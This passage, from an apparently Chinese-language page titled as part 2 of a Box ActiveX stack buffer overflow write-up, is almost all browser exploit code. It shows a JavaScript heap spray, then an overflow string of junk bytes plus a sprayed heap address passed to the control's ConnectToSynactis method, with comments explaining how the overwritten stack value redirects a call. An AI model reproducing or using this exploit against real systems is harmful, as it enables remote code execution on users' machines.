Box ActiveX控件栈缓冲区溢出漏洞(2)

while (data.length < 0x80000) data += data;
     
        for (var i = 0; i < 0x450; i++)
        {
            var obj = document.createElement("button");
            obj.title = data.substring(0,0x40000-0x58);
            div_container.appendChild(obj);
        }
    }
     
    function xploit()
    {
        theMagicalMysteryTour();
        DEPS();
         
        // MOV EAX,DWORD PTR SS:[EBP-10];    the stack is overflowed, ebp-10 is put in eax then >>>>||
        // MOV ECX,DWORD PTR DS:[EAX];                                                              ||
        // CALL DWORD PTR DS:[ECX-4];        BOOOOOOOOOOOM                                    <<<<||
         
        EAX = "\x28\x22\x30\x20";  // 0x20302228  heap adress " Corelan "DEPS" - Precise heap spray "
         
        while (junk1.length < 189) junk1 += "\x41";
        while (junk2.length < 7000) junk2 += "\x41";
         
        var xploit = document.getElementById("xploit");
        xploit.ConnectToSynactis(junk1+EAX+junk2);
    }
     
</script>
 </body>
 </html>